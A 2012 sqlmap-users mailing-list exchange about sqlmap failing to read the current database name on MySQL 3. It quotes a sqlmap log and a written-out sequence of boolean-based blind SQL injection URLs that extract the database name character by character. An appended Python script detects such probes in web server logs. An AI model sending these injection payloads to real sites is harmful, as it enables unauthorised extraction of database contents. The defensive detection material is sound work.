Re: [sqlmap-users] MySql 3 - sqlMap don't retrieve db name -- Suggestion for new implementation
From: Miroslav S. <mir...@gm...> - 2012-04-02 08:08:44
Thank you for your tip. We will keep it in mind to implement it for MySQL 3 (which is currently of low priority).

Kind regards

On Fri, Mar 30, 2012 at 1:44 PM, Marco Mirandola <mm...@gm...> wrote:

> From this DBMS (MySql 3) SqlMap doesn't retrieve the name of 'Current DB'
>
> [13:38:33] [INFO] resuming back-end DBMS 'mysql 3' from session file
> [13:38:33] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: ID
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: ID=26 AND 1443=1443
> ---
> [13:38:38] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Red Hat 7.2 or 7.3 or 7.1 (Seawolf or Enigma or Valhalla)
> web application technology: PHP 4.4.2, Apache 1.3.27
> back-end DBMS: MySQL 3
> [13:38:38] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
> [13:38:38] [INFO] fetching number of databases
> [13:38:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
> [13:38:38] [INFO] retrieved:
> [13:38:57] [ERROR] unable to retrieve the number of databases
> [13:38:57] [INFO] falling back to current database
> [13:38:57] [INFO] fetching current database
> [13:38:57] [INFO] retrieved:
> [13:39:41] [CRITICAL] unable to retrieve the database names
>
> This is the correct sequence to implement:
>
> Get length of database (Length of 'Current DB' is 3)
> ?ID=26+and+Length%28%28database%28%29%29%29%3C32
> ?ID=26+and+Length%28%28database%28%29%29%29%3C16
> ?ID=26+and+Length%28%28database%28%29%29%29%3C8
> ?ID=26+and+Length%28%28database%28%29%29%29%3C4
> ?ID=26+and+Length%28%28database%28%29%29%29%3D3
>
> Try to get the name of database (Name of 'Current DB' is die)
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C79
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C103
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C91
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C97
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C100
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D102
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D101
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D100
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C79
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C103
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C115
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C109
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C106
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3D105
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C79
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C103
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C91
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C97
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C100
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3D102
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3D101
>
> Best regards

--
Miroslav Stampar
http://about.me/stamparm
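Seen from the defending side, the request sequence quoted in this message leaves a recognisable trail in a web server access log. The following is an added example, not part of the original thread and not sqlmap code: it groups such probes by client and reports what was being inferred. The log format, the client addresses, the path `/item.php` and the name `summarize_probes` are assumptions; the query strings are a subset of those quoted above.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# The two probe shapes quoted in the message, matched after URL decoding:
#   and Length((database()))<N    /    and ascii(substring((database()),POS,1))<N
PROBE = re.compile(
    r"(?i)\band\s+(?:(length)\s*\(+\s*database\s*\(\s*\)\s*\)+"
    r"|ascii\s*\(\s*substring\s*\(+\s*database\s*\(\s*\)\s*\)+"
    r"\s*,\s*(\d+)\s*,\s*1\s*\)\s*\))\s*([<>=])\s*(\d+)")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')

def summarize_probes(log_lines, min_probes=5):
    """Return {client: summary} for clients that sent at least min_probes probes."""
    seen = defaultdict(lambda: {"probes": 0, "length": None, "chars": {}})
    for line in log_lines:
        req = REQUEST.match(line)
        hit = PROBE.search(unquote_plus(req.group(2))) if req else None
        if not hit:
            continue
        is_length, pos, op, value = hit.group(1), hit.group(2), hit.group(3), int(hit.group(4))
        entry = seen[req.group(1)]
        entry["probes"] += 1
        if op == "=" and is_length:
            entry["length"] = value            # last length equality tested
        elif op == "=":
            entry["chars"][int(pos)] = value   # last equality tested per position
    report = {}
    for client, e in seen.items():
        if e["probes"] >= min_probes:
            # Heuristic: the log holds no true/false answers, so the last "=" probe
            # per position is only the likely value; confirm against response sizes.
            text = "".join(chr(v) if 32 <= v < 127 else "?" for _, v in sorted(e["chars"].items()))
            report[client] = {"probes": e["probes"], "length_tested": e["length"], "likely_value": text}
    return report

# Constructed sample log: addresses, path and timestamps are made up.
_QUERIES = ["Length%28%28database%28%29%29%29%3C32", "Length%28%28database%28%29%29%29%3D3"] + [
    f"ascii%28substring%28%28database%28%29%29%2C{p}%2C1%29%29%3{op}{v}"
    for p, op, v in [(1, "C", 79), (1, "C", 103), (1, "D", 102), (1, "D", 101), (1, "D", 100),
                     (2, "C", 106), (2, "D", 105), (3, "C", 100), (3, "D", 102), (3, "D", 101)]]
SAMPLE_LOG = [f'203.0.113.7 - - [30/Mar/2012:13:40:{i:02d} +0200] "GET /item.php?ID=26+and+{q} HTTP/1.0" 200 4096'
              for i, q in enumerate(_QUERIES)]
SAMPLE_LOG.append('198.51.100.4 - - [30/Mar/2012:13:41:00 +0200] "GET /item.php?ID=26 HTTP/1.0" 200 4096')

if __name__ == "__main__":
    for client, summary in summarize_probes(SAMPLE_LOG).items():
        print(client, summary)
```
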